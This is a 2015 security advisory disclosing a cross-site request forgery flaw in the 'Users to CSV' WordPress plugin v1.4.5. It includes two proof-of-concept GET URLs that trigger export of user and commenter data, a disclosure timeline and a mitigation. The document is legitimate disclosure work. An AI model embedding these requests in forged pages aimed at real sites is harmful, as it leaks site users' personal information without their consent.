# Title: Cross-Site Request Forgery Vulnerability in Users to CSV Wordpress Plugin v1.4.5 # Submitter: Nitin Venkatesh # Product: Users to CSV Wordpress Plugin # Product URL: https://wordpress.org/plugins/users-to-csv/ (disabled) # Plugin SVN URL: https://plugins.svn.wordpress.org/users-to-csv/ (active) # Vulnerability Type: Cross-site Request Forgery [CWE-352] # Affected Versions: v1.4.5 and possibly below. # Tested versions: v1.4.5 # Fixed Version: None. Support for the plugin has been deceased. # CVE Status: None/Unassigned/Fresh ## Product Information: This plugin adds an admin screen under "Users", giving two options: exporting the current users to a csv file and exporting the unique commenters on your blog to a csv file. ## Vulnerability Description: User information can be exported via a GET request to users.php via CSRF. ## Proof of Concept: http://localhost/wp-admin/users.php?page=users2csv.php&csv=true&table=users http://localhost/wp-admin/users.php?page=users2csv.php&csv=true&table=comments ## Solution: Disable the plugin. Support has been ceased. ## Disclosure Timeline: 2015-06-08 - Discovered. Contacted developer. 2015-06-08 - Developer responds that support for plugin has ceased. 2015-06-13 - Noticed plugin site has been disabled. It must?ve happened somewhere between 2015-06-09 and 2015-06-13. Contacted developer for re-confirmation. 2015-06-14 - Developer gives go-ahead for publishing a disclosure. 2015-06-15 - Publishing disclosure on Full Disclosure mailing list. ## Disclaimer: This disclosure is purely meant for educational purposes. I will in no way be responsible as to how the information in this disclosure is used.